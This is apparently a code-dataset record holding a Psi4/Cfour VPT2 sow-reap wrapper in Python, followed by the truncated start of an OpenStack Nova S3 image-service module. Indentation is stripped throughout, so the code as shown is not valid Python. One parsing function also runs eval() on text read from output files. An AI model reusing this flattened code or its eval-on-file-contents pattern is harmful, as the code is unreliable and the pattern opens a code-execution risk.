sys.stderr.write('Program %s not found in path or execution failed: %s\n' % (cfour_executable, e.strerror))
#p4out.write('Program %s not found in path or execution failed: %s\n' % (cfour_executable, e.strerror))
message = ('Program %s not found in path or execution failed: %s\n' % (cfour_executable, e.strerror))
raise ValidationError(message)
c4out = ''
while True:
data = retcode.stdout.readline()
if not data:
break
#if core.outfile_name() == 'stdout':
# sys.stdout.write(data)
#else:
# p4out.write(data)
# p4out.flush()
c4out += data
#internal_p4c4_info['output'] = c4out
return c4out
def vpt2(name, **kwargs):
"""Perform vibrational second-order perturbation computation through
Cfour to get anharmonic frequencies. This version uses c4 for the disp
and pt2 but gets gradients from p4.
:type c4full: :ref:`boolean <op_py_boolean>`
:param c4full: ``'on'`` || |dl| ``'off'`` |dr|
Indicates whether when *name* indicates a Cfour method and *mode*
indicates a sow/reap approach, sown files are direct ZMAT files
and FJOBARC files are expected to reap, so that Cfour only, not
Cfour-through-Psi4, is needed for distributed jobs.
.. caution:: Some features are not yet implemented. Buy a developer a coffee.
- Presently uses all gradients. Could mix in analytic 2nd-derivs.
- Collect resutls.
- Manage scratch / subdir better.
- Allow CFOUR_BASIS
- Consider forcing some tighter convcrit, c4 and p4
- mixed ang/bohr signals
- error by converting to ang in psi?
- Expand CURRENT DIPOLE XYZ beyond SCF
- Remember additional FJOBARC record TOTENER2 if EXCITE .ne. NONE
- switch C --> S/R with recovery using shelf
"""
lowername = name.lower()
kwargs = p4util.kwargs_lower(kwargs)
optstash = p4util.OptionsState(
['BASIS'])
# Option mode of operation- whether vpt2 run in one job or files farmed out
if not('vpt2_mode' in kwargs):
if ('mode' in kwargs):
kwargs['vpt2_mode'] = kwargs['mode']
del kwargs['mode']
else:
kwargs['vpt2_mode'] = 'continuous'
# Switches for route through code- S/R or continuous & Psi4 or Cfour gradients
isSowReap = True if kwargs['vpt2_mode'].lower() == 'sowreap' else False
isC4notP4 = bool(re.match('cfour', lowername)) or bool(re.match('c4-', lowername))
isC4fully = True if ('c4full' in kwargs and yes.match(str(kwargs['c4full'])) and isC4notP4 and isSowReap) else False
# Save submission directory and basis set
current_directory = os.getcwd()
user_basis = core.get_global_option('BASIS')
# Open data persistence shelf- vital for sowreap, checkpoint for continuouw
shelf = shelve.open(current_directory + '/' + os.path.splitext(core.outfile_name())[0] + '.shelf', writeback=True)
# Cfour keywords to request vpt2 analysis through findif gradients
core.set_local_option('CFOUR', 'CFOUR_VIBRATION', 'FINDIF')
core.set_local_option('CFOUR', 'CFOUR_FREQ_ALGORITHM', 'PARALLEL')
core.set_local_option('CFOUR', 'CFOUR_ANH_ALGORITHM', 'PARALLEL')
core.set_local_option('CFOUR', 'CFOUR_ANHARMONIC', 'VPT2')
core.set_local_option('CFOUR', 'CFOUR_FD_PROJECT', 'OFF')
# When a Psi4 method is requested for vpt2, a skeleton of
# computations in Cfour is still required to hang the gradients
# upon. The skeleton is as cheap as possible (integrals only
# & sto-3g) and set up here.
if isC4notP4:
skelname = lowername
else:
skelname = 'c4-scf'
core.set_global_option('BASIS', 'STO-3G')
# P4 'c4-scf'/'cfour'CALC_LEVEL lowername # temporary
# C4 lowername cfour{} # temporary
if 'status' not in shelf:
shelf['status'] = 'initialized'
shelf['linkage'] = os.getpid()
shelf['zmat'] = {} # Cfour-generated ZMAT files with finite difference geometries
shelf['fjobarc'] = {} # Cfour- or Psi4-generated ascii files with packaged gradient results
shelf.sync()
else:
pass
# how decide whether to use. keep precedent of intco.dat in mind
# Construct and move into directory job scratch / cfour scratch / harm
psioh = core.IOManager.shared_object()
psio = core.IO.shared_object()
os.chdir(psioh.get_default_path()) # psi_scratch
cfour_tmpdir = kwargs['path'] if 'path' in kwargs else \
'psi.' + str(os.getpid()) + '.' + psio.get_default_namespace() + \
'.cfour.' + str(uuid.uuid4())[:8]
if not os.path.exists(cfour_tmpdir):
os.mkdir(cfour_tmpdir)
os.chdir(cfour_tmpdir) # psi_scratch/cfour
if not os.path.exists('harm'):
os.mkdir('harm')
os.chdir('harm') # psi_scratch/cfour/harm
psioh.set_specific_retention(32, True) # temporary, to track p4 scratch
#shelf['status'] = 'anharm_jobs_sown' # temporary to force backtrack
print('STAT', shelf['status']) # temporary
# Generate the ZMAT input file in scratch
with open('ZMAT', 'w') as handle:
cfour_infile = write_zmat(skelname, 1)
handle.write(cfour_infile)
print('\n====== Begin ZMAT input for CFOUR ======')
print(open('ZMAT', 'r').read())
print('======= End ZMAT input for CFOUR =======\n')
shelf['genbas'] = open('GENBAS', 'r').read()
# Check existing shelf consistent with generated ZMAT, store
if ('000-000' in shelf['zmat']) and (shelf['zmat']['000-000'] != cfour_infile):
diff = difflib.Differ().compare(shelf['zmat']['000-000'].splitlines(), cfour_infile.splitlines())
raise ValidationError("""Input file translated to Cfour ZMAT does not match ZMAT stored in shelf.\n\n""" +
'\n'.join(list(diff)))
shelf['zmat']['000-000'] = cfour_infile
shelf.sync()
# Reset basis after Cfour skeleton seeded
core.set_global_option('BASIS', user_basis)
if shelf['status'] == 'initialized':
p4util.banner(' VPT2 Setup: Harmonic ')
# Generate the displacements that will form the harmonic freq
os.chdir(psioh.get_default_path() + cfour_tmpdir + '/harm') # psi_scratch/cfour/harm
with open('partial.out', 'w') as handle:
handle.write(run_cfour_module('xjoda'))
handle.write(run_cfour_module('xsymcor'))
# Read the displacements that will form the harmonic freq
zmats0N = ['000-' + item[-3:] for item in sorted(glob.glob('zmat*'))]
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
with open('zmat' + zm2, 'r') as handle:
shelf['zmat'][zm12] = handle.read()
shelf.sync()
core.print_out(' CFOUR scratch file %s for %s-%s has been read\n' % ('zmat' + zm2, zm1, zm2))
core.print_out('%s\n' % shelf['zmat'][zm12])
# S/R: Write distributed input files for harmonic freq
if isSowReap:
os.chdir(current_directory)
inputSansMol = p4util.format_currentstate_for_input(gradient, lowername, allButMol=True, **kwargs)
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
ifile = vpt2_sow_files(zm12, shelf['linkage'], isC4notP4, isC4fully,
shelf['zmat'][zm12], inputSansMol, shelf['genbas'])
with open('VPT2-' + zm12 + '.in', 'w') as handle:
handle.write(ifile)
msg = vpt2_instructions('harmonic', current_directory, zmats0N)
core.print_out(msg)
print(msg)
shelf['status'] = 'harm_jobs_sown'
# S/R: Pause for distributed calculations
if isSowReap:
shelf.close()
return 0.0
if shelf['status'] == 'harm_jobs_sown':
zmats0N = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] == '000' and item[-3:] != '000')]
# S/R: Check that distributed calcs all completed correctly
if isSowReap:
msg = vpt2_instructions('harmonic', current_directory, zmats0N)
core.print_out(msg)
isOk, msg = sown_jobs_status(current_directory, 'VPT2', zmats0N, reap_job_validate,
shelf['linkage'], ['CURRENT ENERGY', 'CURRENT DIPOLE', 'CURRENT GRADIENT'])
core.print_out(msg)
print(msg)
if not isOk:
shelf.close()
return 0.0
# Collect all results from gradients forming the harmonic freq
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
if zm12 not in shelf['fjobarc']:
p4util.banner(' VPT2 Computation: %s ' % (zm12))
print(' VPT2 Computation: %s ' % (zm12))
fjobarc = vpt2_reaprun_files(zm12, shelf['linkage'], isSowReap, isC4notP4, isC4fully,
shelf['zmat'][zm12], current_directory, psioh.get_default_path(), cfour_tmpdir,
lowername, kwargs)
shelf['fjobarc'][zm12] = fjobarc
shelf.sync()
shelf['status'] = 'harm_jobs_reaped'
if shelf['status'] == 'harm_jobs_reaped':
zmats0N = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] == '000' and item[-3:] != '000')]
p4util.banner(' VPT2 Results: Harmonic ')
# Process the gradients into harmonic freq
os.chdir(psioh.get_default_path() + cfour_tmpdir + '/harm') # psi_scratch/cfour/harm
harmout = run_cfour_module('xjoda')
harmout += run_cfour_module('xsymcor')
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
with open('FJOBARC', 'w') as handle:
handle.write(shelf['fjobarc'][zm12])
harmout += run_cfour_module('xja2fja')
harmout += run_cfour_module('xsymcor')
shutil.move('FJOBARC', 'fja.' + zm12)
try:
os.remove('zmat' + zm2)
except OSError:
pass
harmout += run_cfour_module('xjoda')
harmout += run_cfour_module('xcubic')
core.print_out(harmout)
with open('harm.out', 'w') as handle:
handle.write(harmout)
# Generate displacements along harmonic normal modes
zmatsN0 = [item[-3:] for item in sorted(glob.glob('zmat*'))]
os.chdir('..') # psi_scratch/cfour
for zm1 in zmatsN0:
zm12 = zm1 + '-000'
with open(psioh.get_default_path() + cfour_tmpdir + '/harm/zmat' + zm1, 'r') as handle:
shelf['zmat'][zm12] = handle.read()
shelf.sync()
core.print_out(' CFOUR scratch file %s for %s has been read\n' % ('zmat' + zm1, zm12))
core.print_out('%s\n' % shelf['zmat'][zm12])
# Collect displacements along the normal coordinates generated by the harmonic freq.
# Further harmonic freqs are to be run at each of these to produce quartic force field.
# To carry these out, generate displacements for findif by gradient at each displacement.
if os.path.exists(zm1):
shutil.rmtree(zm1)
os.mkdir(zm1)
os.chdir(zm1) # psi_scratch/cfour/004
with open('ZMAT', 'w') as handle:
handle.write(shelf['zmat'][zm12])
shutil.copy2('../harm/GENBAS', 'GENBAS') # ln -s $ecpdir/ECPDATA $j/ECPDATA
with open('partial.out', 'w') as handle:
handle.write(run_cfour_module('xjoda'))
handle.write(run_cfour_module('xsymcor'))
# Read the displacements that will form the anharmonic freq
zmatsNN = [item[-3:] for item in sorted(glob.glob('zmat*'))]
for zm2 in zmatsNN:
zm12 = zm1 + '-' + zm2
with open(psioh.get_default_path() + cfour_tmpdir + '/' + zm1 + '/zmat' + zm2, 'r') as handle:
shelf['zmat'][zm12] = handle.read()
shelf.sync()
core.print_out(' CFOUR scratch file %s for %s has been read\n' % ('zmat' + zm2, zm12))
core.print_out('%s\n' % shelf['zmat'][zm12])
os.chdir('..') # psi_scratch/cfour
zmatsNN = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] != '000' and item[-3:] != '000')]
# S/R: Write distributed input files for anharmonic freq
if isSowReap:
os.chdir(current_directory)
inputSansMol = p4util.format_currentstate_for_input(gradient, lowername, allButMol=True, **kwargs)
for zm12 in zmatsNN:
zm1, zm2 = zm12.split('-')
ifile = vpt2_sow_files(zm12, shelf['linkage'], isC4notP4, isC4fully,
shelf['zmat'][zm12], inputSansMol, shelf['genbas'])
# GENBAS needed here
with open('VPT2-' + zm12 + '.in', 'w') as handle:
handle.write(ifile)
msg = vpt2_instructions('anharmonic', current_directory, zmatsNN)
core.print_out(msg)
print(msg)
shelf['status'] = 'anharm_jobs_sown'
# S/R: Pause for distributed calculations
if isSowReap:
shelf.close()
return 0.0
if shelf['status'] == 'anharm_jobs_sown':
zmatsNN = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] != '000' and item[-3:] != '000')]
# S/R: Check that distributed calcs all completed correctly
if isSowReap:
msg = vpt2_instructions('anharmonic', current_directory, zmatsNN)
core.print_out(msg)
isOk, msg = sown_jobs_status(current_directory, 'VPT2', zmatsNN,
reap_job_validate, shelf['linkage'],
['CURRENT ENERGY', 'CURRENT DIPOLE', 'CURRENT GRADIENT'])
core.print_out(msg)
print(msg)
if not isOk:
shelf.close()
return 0.0
# Collect all results from gradients forming the anharmonic freq
for zm12 in zmatsNN:
zm1, zm2 = zm12.split('-')
if zm12 not in shelf['fjobarc']:
p4util.banner(' VPT2 Computation: %s ' % (zm12))
print(' VPT2 Computation: %s ' % (zm12))
fjobarc = vpt2_reaprun_files(zm12, shelf['linkage'], isSowReap, isC4notP4, isC4fully,
shelf['zmat'][zm12], current_directory, psioh.get_default_path(), cfour_tmpdir,
lowername, kwargs)
shelf['fjobarc'][zm12] = fjobarc
shelf.sync()
shelf['status'] = 'anharm_jobs_reaped'
if shelf['status'] == 'anharm_jobs_reaped':
zmats0N = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] == '000' and item[-3:] != '000')]
zmatsN0 = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] != '000' and item[-3:] == '000')]
zmatsNN = [item for item in sorted(shelf['zmat'].keys()) if (item[:3] != '000' and item[-3:] != '000')]
p4util.banner(' VPT2 Results: Harmonic ')
# Process the gradients into harmonic freq
os.chdir(psioh.get_default_path() + cfour_tmpdir) # psi_scratch/cfour
if os.path.exists('anharm'):
shutil.rmtree('anharm')
os.mkdir('anharm')
os.chdir('harm') # psi_scratch/cfour/harm
run_cfour_module('xclean')
anharmout = run_cfour_module('xjoda')
anharmout += run_cfour_module('xsymcor')
for zm12 in zmats0N:
zm1, zm2 = zm12.split('-')
with open('FJOBARC', 'w') as handle:
handle.write(shelf['fjobarc'][zm12])
anharmout += run_cfour_module('xja2fja')
anharmout += run_cfour_module('xsymcor')
shutil.move('FJOBARC', 'fja.' + zm12)
anharmout += run_cfour_module('xjoda')
anharmout += run_cfour_module('xcubic')
core.print_out(anharmout)
with open('harm.out', 'w') as handle:
handle.write(anharmout)
# Process the gradients into harmonic freq at each normco displaced point
os.chdir('..') # psi_scratch/cfour
for zm11 in zmatsN0:
zm1 = zm11[:3]
if os.path.exists(zm1):
shutil.rmtree(zm1)
os.mkdir(zm1)
os.chdir(zm1) # psi_scratch/cfour/004
run_cfour_module('xclean')
with open('ZMAT', 'w') as handle:
handle.write(shelf['zmat'][zm11])
shutil.copy2('../harm/GENBAS', 'GENBAS')
anharmout = run_cfour_module('xjoda')
anharmout += run_cfour_module('xsymcor')
for zm22 in [item for item in zmatsNN if (item[:3] == zm1 and item[-3:] != '000')]:
zm2 = zm22[-3:]
zm12 = zm1 + '-' + zm2
print(zm12)
with open('FJOBARC', 'w') as handle:
handle.write(shelf['fjobarc'][zm12])
anharmout += run_cfour_module('xja2fja')
anharmout += run_cfour_module('xsymcor')
shutil.move('FJOBARC', 'fja.' + zm12)
anharmout += run_cfour_module('xjoda')
anharmout += run_cfour_module('xja2fja')
with open('FJOBARC', 'r') as handle:
shelf['fjobarc'][zm11] = handle.read()
shelf.sync()
core.print_out(anharmout)
with open('partial.out', 'w') as handle:
handle.write(anharmout)
os.chdir('..') # psi_scratch/cfour
# Process the harmonic freqs at normco displacements into anharmonic freq
p4util.banner(' VPT2 Results: Anharmonic ')
os.chdir('anharm') # psi_scratch/cfour/anharm
shutil.copy2('../harm/JOBARC', 'JOBARC')
shutil.copy2('../harm/JAINDX', 'JAINDX')
for zm12 in zmatsN0:
with open('FJOBARC', 'w') as handle:
handle.write(shelf['fjobarc'][zm12])
anharmout = run_cfour_module('xja2fja')
anharmout += run_cfour_module('xcubic')
shutil.move('FJOBARC', 'fja.' + zm12)
core.print_out(anharmout)
with open('anharm.out', 'w') as handle:
handle.write(anharmout)
shelf['status'] = 'vpt2_completed'
# Finish up
os.chdir(current_directory)
shelf.close()
optstash.restore()
def vpt2_sow_files(item, linkage, isC4notP4, isC4fully, zmat, inputSansMol, inputGenbas):
"""Provided with the particular displacement number *item* and the
associated *zmat* file contents and *linkage*, and common contents
*inputSansMol*, returns contents of input file to be sown.
"""
inputReapOrders = r"""
print_variables()
print_out('VPT2 RESULT: linkage {0} for item {1} yields CURRENT ENERGY being %r\n' % (variable('CURRENT ENERGY')))
print_out('VPT2 RESULT: linkage {0} for item {1} yields CURRENT GRADIENT being %r\n' % (p4util.mat2arr(core.get_gradient())))
print_out('VPT2 RESULT: linkage {0} for item {1} yields CURRENT DIPOLE being [%r, %r, %r]\n' % (variable('CURRENT DIPOLE X'), variable('CURRENT DIPOLE Y'), variable('CURRENT DIPOLE Z')))
""".format(linkage, item)
# Direct Cfour for gradients
if isC4fully:
inputString = zmat
with open('VPT2-GENBAS', 'w') as handle:
handle.write(inputGenbas)
# Cfour for gradients
elif isC4notP4:
# GENBAS needed here
inputString = 'extracted_genbas = """\n' + inputGenbas.replace('\n\n', '\nblankline\n') + '\n"""\n\n'
inputString += """cfour {\n%s\n}\n\nenergy('cfour', genbas=extracted_genbas)\n\n""" % (zmat)
inputString += inputReapOrders
inputString += r"""
print_out('VPT2 RESULT: linkage {0} for item {1} yields CURRENT MOLECULE being %r\n' % (get_active_molecule().create_psi4_string_from_molecule()))
""".format(linkage, item)
# Psi4 for gradients
else:
inputString = p4util.format_molecule_for_input(
qcdb.cfour.harvest_zmat(zmat).create_psi4_string_from_molecule(),
name='disp' + item[:3] + item[-3:])
inputString += inputSansMol
inputString += inputReapOrders
return inputString
def vpt2_reaprun_files(item, linkage, isSowReap, isC4notP4, isC4fully, zmat, outdir, scrdir, c4scrdir, lowername, kwargs):
"""Provided with the particular displacement number *item* and the
associated *zmat* file with geometry and *linkage*, returns the
FJOBARC contents. Depending on the mode settings of *isC4notP4*,
*isSowReap*, and *isC4fully*, either runs (using *lowername* and
*kwargs*) or reaps contents. *outdir* is where psi4 was invoked,
*scrdir* is the psi4 scratch directory, and *c4scrdir* is Cfour
scratch directory within.
"""
os.chdir(outdir) # current_directory
# Extract qcdb.Molecule at findif orientation
zmmol = qcdb.cfour.harvest_zmat(zmat)
# Cfour S/R Direct for gradients
if isC4fully:
with open('VPT2-' + item + '.fja', 'r') as handle:
fjobarc = handle.read()
# Cfour for gradients
elif isC4notP4:
# S/R: Reap results from output file
if isSowReap:
isOk, msg, results = reap_job_validate(outdir, 'VPT2', item, linkage,
['CURRENT ENERGY', 'CURRENT DIPOLE', 'CURRENT GRADIENT', 'CURRENT MOLECULE'])
if not isOk:
raise ValidationError(msg)
fje = results['CURRENT ENERGY']
fjgrd = results['CURRENT GRADIENT']
fjdip = [item / constants.dipmom_au2debye for item in results['CURRENT DIPOLE']]
c4mol = qcdb.Molecule(results['CURRENT MOLECULE'])
c4mol.update_geometry()
# C: Run the job and collect results
else:
# Prepare Cfour skeleton calc directory
os.chdir(scrdir + c4scrdir) # psi_scratch/cfour
if os.path.exists('scr.' + item):
shutil.rmtree('scr.' + item)
os.mkdir('scr.' + item)
os.chdir('scr.' + item) # psi_scratch/cfour/scr.000-004
with open('ZMAT', 'w') as handle:
handle.write(zmat)
shutil.copy2('../harm/GENBAS', 'GENBAS')
#os.chdir(scrdir + '/scr.' + item)
#run_cfour_module('xja2fja')
#with open('FJOBARC', 'r') as handle:
# fjobarc = handle.read()
# Run Cfour calc using ZMAT & GENBAS in scratch, outdir redirects to outfile
os.chdir(outdir) # current_directory
core.get_active_molecule().set_name('blank_molecule_psi4_yo')
energy('cfour', path=c4scrdir + '/scr.' + item)
# os.chdir(scrdir + '/scr.' + item)
fje = core.variable('CURRENT ENERGY')
fjgrd = p4util.mat2arr(core.get_gradient())
fjdip = [core.variable('CURRENT DIPOLE X') / constants.dipmom_au2debye,
core.variable('CURRENT DIPOLE Y') / constants.dipmom_au2debye,
core.variable('CURRENT DIPOLE Z') / constants.dipmom_au2debye]
c4mol = qcdb.Molecule(core.get_active_molecule().create_psi4_string_from_molecule())
c4mol.update_geometry()
# Get map btwn ZMAT and C4 orientation, then use it, grad and dipole to forge FJOBARC file
fjobarc = qcdb.cfour.format_fjobarc(fje,
*qcdb.cfour.backtransform(chgeMol=zmmol, permMol=c4mol), gradient=fjgrd, dipole=fjdip)
# Psi4 for gradients
else:
# Prepare Cfour skeleton calc directory
os.chdir(scrdir + c4scrdir) # psi_scratch/cfour
if os.path.exists('scr.' + item):
shutil.rmtree('scr.' + item)
os.mkdir('scr.' + item)
os.chdir('scr.' + item) # psi_scratch/cfour/scr.000-004
with open('ZMAT', 'w') as handle:
handle.write(zmat)
shutil.copy2('../harm/GENBAS', 'GENBAS')
# Run Cfour skeleton calc and extract qcdb.Molecule at needed C4 orientation
with open('partial.out', 'w') as handle:
handle.write(run_cfour_module('xjoda'))
handle.write(run_cfour_module('xvmol'))
handle.write(run_cfour_module('xvmol2ja'))
core.print_out(' CFOUR scratch file %s for %s has been read\n' % ('JOBARC (binary)', item))
c4mol = qcdb.cfour.jajo2mol(qcdb.jajo.getrec(['COORD ', 'ATOMCHRG', 'MAP2ZMAT', 'IFLAGS ']))
# S/R: Reap results from output file
if isSowReap:
isOk, msg, results = reap_job_validate(outdir, 'VPT2', item, linkage,
['CURRENT ENERGY', 'CURRENT DIPOLE', 'CURRENT GRADIENT'])
if not isOk:
raise ValidationError(msg)
fje = results['CURRENT ENERGY']
fjgrd = results['CURRENT GRADIENT']
fjdip = [item / constants.dipmom_au2debye for item in results['CURRENT DIPOLE']]
# C: Run the job and collect results
else:
core.IO.set_default_namespace(item)
molecule = geometry(zmmol.create_psi4_string_from_molecule(), 'disp-' + item)
molecule.update_geometry()
gradient(lowername, **kwargs)
fje = core.variable('CURRENT ENERGY')
fjgrd = p4util.mat2arr(core.get_gradient())
fjdip = [core.variable('CURRENT DIPOLE X') / constants.dipmom_au2debye,
core.variable('CURRENT DIPOLE Y') / constants.dipmom_au2debye,
core.variable('CURRENT DIPOLE Z') / constants.dipmom_au2debye]
# Transform results into C4 orientation (defined by c4mol) & forge FJOBARC file
fjobarc = qcdb.cfour.format_fjobarc(fje,
*qcdb.cfour.backtransform(chgeMol=zmmol, permMol=c4mol, chgeGrad=fjgrd, chgeDip=fjdip))
return fjobarc
def vpt2_instructions(stage, dir, zmats):
"""Stores all the instructions to the user for running
:py:func:`~wrappers_cfour.vpt2` in sowreap mode. Depending on the
*stage*, Pieces together instruction strings for the appropriate
*stage* individualized by working directory *dir* and sown inputs
*zmats* information.
"""
stepFiles = ''
for zm12 in sorted(zmats):
stepFiles += """ psi4 %-27s %-27s\n""" % ('VPT2-' + zm12 + '.in', 'VPT2-' + zm12 + '.out')
step0 = """
The vpt2 sow/reap procedure has been selected through mode='sowreap'. This
output file, the corresponding input file, and the data persistence file
must not be edited by the user over the course of the sow/reap procedure.
Throughout, psi4 can be invoked to move to the next stage of the procedure
or to tally up the 'sown' jobs. This output file is overwritten each time
psi4 is invoked, but all results and instructions accumulate.
This procedure involves two stages of distributed calculations, harmonic and
anharmonic, and a mimimum of three invokations of psi4 on the original input
file (including the one that initially generated this text). From the input
geometry (0), displacements are generated for which gradients are required.
Input files for these are 'sown' in the current directory (1). Upon
completion, their output files are 'reaped' into a harmonic force field (2).
At displacements along the normal coordinates, further displacements are
generated for which gradients are required. Input files for these are again
'sown' in the current directory (3). Upon completion, their output files are
'reaped' into an anharmonic force field (4), terminating the vpt2 procedure.
Follow the instructions below to continue.
(0) Read Only
--------------
%s
%s
%s
""" % (dir + '/' + os.path.splitext(core.outfile_name())[0] + '.in',
dir + '/' + core.outfile_name(),
dir + '/' + os.path.splitext(core.outfile_name())[0] + '.shelf')
step1 = """
(1) Sow
--------
Run all of the VPT2-000-*.in input files on any variety of computer
architecture. The output file names must be as given below (default).
"""
step2 = """
(2) Reap
---------
Gather all the resulting output files in this directory along with the
three read-only files from (0). Invoke psi4 again. The job will be
trivial in length (unless sto-3g integrals on the molecule are costly)
and give results for the harmonic frequency stage in this output file. It
will also supply the next set of instructions.
psi4 %-27s %-27s
""" % (os.path.splitext(core.outfile_name())[0] + '.in', core.outfile_name())
step3 = """
(3) Sow
--------
Run all of the VPT2-*-*.in input files on any variety of computer
architecture. The output file names must be as given below (default).
"""
step4 = """
(4) Reap
---------
Gather all the resulting output files in this directory along with the
three read-only files from (0). Invoke psi4 again. The job will be
trivial in length (unless sto-3g integrals on the molecule are costly)
and give results for the harmonic and anharmonic frequency stages in this
output file.
psi4 %-27s %-27s
""" % (os.path.splitext(core.outfile_name())[0] + '.in', core.outfile_name())
if stage == 'harmonic':
instructions = step0 + step1 + stepFiles + step2
elif stage == 'anharmonic':
instructions = step0 + step3 + stepFiles + step4
return instructions
def sown_jobs_status(dir, prefix, zmats, validate_func=None, linkage=None, keys=None):
"""Evaluate the output file status of jobs in *zmats* which should
exist at *dir* + '/' + prefix + '-' + job + '.out'. Returns string with
formatted summary of job status and boolean of whether all complete.
Return boolean *isOk* signals whether all *zmats* have completed and,
if *validate_func* present, are validated.
"""
isOk = True
msgError = ''
instructions = '\n'
instructions += p4util.banner(prefix + ' Status: ' + datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), strNotOutfile=True)
instructions += '\n'
for job in sorted(zmats):
outfile = dir + '/' + prefix + '-' + job + '.out'
fjafile = dir + '/' + prefix + '-' + job + '.fja'
formatArgs = [prefix + '-' + job, '', '', '', '']
if os.path.isfile(outfile):
with open(outfile, 'r') as handle:
for line in handle:
if line.find('Buy a developer a beer!') > -1:
formatArgs[3] = 'Completed'
if reap_job_validate is not None:
isOkJob, msg, temp = reap_job_validate(dir, prefix, job, linkage, keys)
if isOkJob:
formatArgs[4] = '& Validated'
else:
isOk = False
msgError += msg
formatArgs[4] = 'INVALID'
break
else:
isOk = False
formatArgs[2] = 'Running'
elif os.path.isfile(fjafile):
formatArgs[3] = 'Completed'
else:
isOk = False
formatArgs[1] = 'Waiting'
instructions += """ {0:<27} {1:^10} {2:^10} {3:^10} {4:^10}\n""".format(*formatArgs)
instructions += '\n' + msgError + '\n\n'
return isOk, instructions
def reap_job_validate(dir, prefix, item, linkage, keys):
"""For a given output file whose path is constructed with
*dir* + '/' + *prefix* + '-' + *item* + '.out', tests that the file
exists and has *prefix* RESULTS lines for each piece of information
requested in list *keys* and that those lines correspond to the
appropriate *linkage* and *item*. Returns *keys* along with their
scanned values in dict *reapings*, along with error and success
messages in *instructions* and a boolean *isOk* indicating whether
all *keys* reaped sucessfully.
"""
isOk = True
instructions = ''
reapings = {}
outfile = dir + '/' + prefix + '-' + item + '.out'
try:
with open(outfile, 'r') as handle:
for line in handle:
if line.find(prefix + ' RESULT:') == 0:
sline = line.split()
if sline[2:7] == ['linkage', str(linkage), 'for', 'item', item]:
yieldsAt = line.find('yields')
beingAt = line.find('being')
if beingAt > yieldsAt > -1:
key = line[yieldsAt + 6:beingAt].strip()
val = line[beingAt + 5:].strip()
if key in keys:
reapings[key] = eval(val)
#core.print_out(' CFOUR scratch file %s for %s has been read\n' % ('JOBARC', zm12))
else:
isOk = False
instructions += """Outfile file %s
has corrupted sowreap result line:\n%s\n\n""" % (outfile, line)
else:
isOk = False
instructions += """Outfile file %s
has sowreap result of either incompatible linkage (observed: %s, expected: %s)
or incompatible job affiliation (observed: %s, expected: %s).\n\n""" % \
(outfile, sline[3], linkage, sline[6], item)
else:
if len(reapings) != len(keys):
isOk = False
instructions += """Output file %s
has missing results (observed: %s, expected: %s).\n\n""" % \
(outfile, reapings.keys(), keys)
except IOError:
isOk = False
instructions += """Output file %s
that was judged present and complete at the beginning of this
job is now missing. Replace it and invoke psi4 again.\n\n""" % (outfile)
# return file contents in instructions
return isOk, instructions, reapings | unknown | codeparrot/codeparrot-clean | ||
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Proxy AMI-related calls from cloud controller to objectstore service."""
import base64
import binascii
import os
import shutil
import tarfile
import tempfile
import boto.s3.connection
import eventlet
from lxml import etree
from oslo.config import cfg
from nova.api.ec2 import ec2utils
import nova.cert.rpcapi
from nova import exception
from nova.image import glance
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import processutils
from nova import utils
LOG = logging.getLogger(__name__)
s3_opts = [
cfg.StrOpt('image_decryption_dir',
default='/tmp',
help='parent dir for tempdir used for image decryption'),
cfg.StrOpt('s3_host',
default='$my_ip',
help='hostname or ip for OpenStack to use when accessing '
'the s3 api'),
cfg.IntOpt('s3_port',
default=3333,
help='port used when accessing the s3 api'),
cfg.StrOpt('s3_access_key',
default='notchecked',
help='access key to use for s3 server for images'),
cfg.StrOpt('s3_secret_key',
default='notchecked',
help='secret key to use for s3 server for images'),
cfg.BoolOpt('s3_use_ssl',
default=False,
help='whether to use ssl when talking to s3'),
cfg.BoolOpt('s3_affix_tenant',
default=False,
help='whether to affix the tenant id to the access key '
'when downloading from s3'),
]
CONF = cfg.CONF
CONF.register_opts(s3_opts)
CONF.import_opt('my_ip', 'nova.netconf')
class S3ImageService(object):
"""Wraps an existing image service to support s3 based register."""
# translate our internal state to states valid by the EC2 API documentation
image_state_map = {'downloading': 'pending',
'failed_download': 'failed',
'decrypting': 'pending',
'failed_decrypt': 'failed',
'untarring': 'pending',
'failed_untar': 'failed',
'uploading': 'pending',
'failed_upload': 'failed',
'available': 'available'}
def __init__(self, service=None, *args, **kwargs):
self.cert_rpcapi = nova.cert.rpcapi.CertAPI()
self.service = service or glance.get_default_image_service()
self.service.__init__(*args, **kwargs)
def _translate_uuids_to_ids(self, context, images):
return [self._translate_uuid_to_id(context, img) for img in images]
def _translate_uuid_to_id(self, context, image):
image_copy = image.copy()
try:
image_uuid = image_copy['id']
except KeyError:
pass
else:
image_copy['id'] = ec2utils.glance_id_to_id(context, image_uuid)
for prop in ['kernel_id', 'ramdisk_id']:
try:
image_uuid = image_copy['properties'][prop]
except (KeyError, ValueError):
pass
else:
image_id = ec2utils.glance_id_to_id(context, image_uuid)
image_copy['properties'][prop] = image_id
try:
image_copy['properties']['image_state'] = self.image_state_map[
image['properties']['image_state']]
except (KeyError, ValueError):
pass
return image_copy
def _translate_id_to_uuid(self, context, image):
image_copy = image.copy()
try:
image_id = image_copy['id']
except KeyError:
pass
else:
image_copy['id'] = ec2utils.id_to_glance_id(context, image_id)
for prop in ['kernel_id', 'ramdisk_id']:
try:
image_id = image_copy['properties'][prop]
except (KeyError, ValueError):
pass
else:
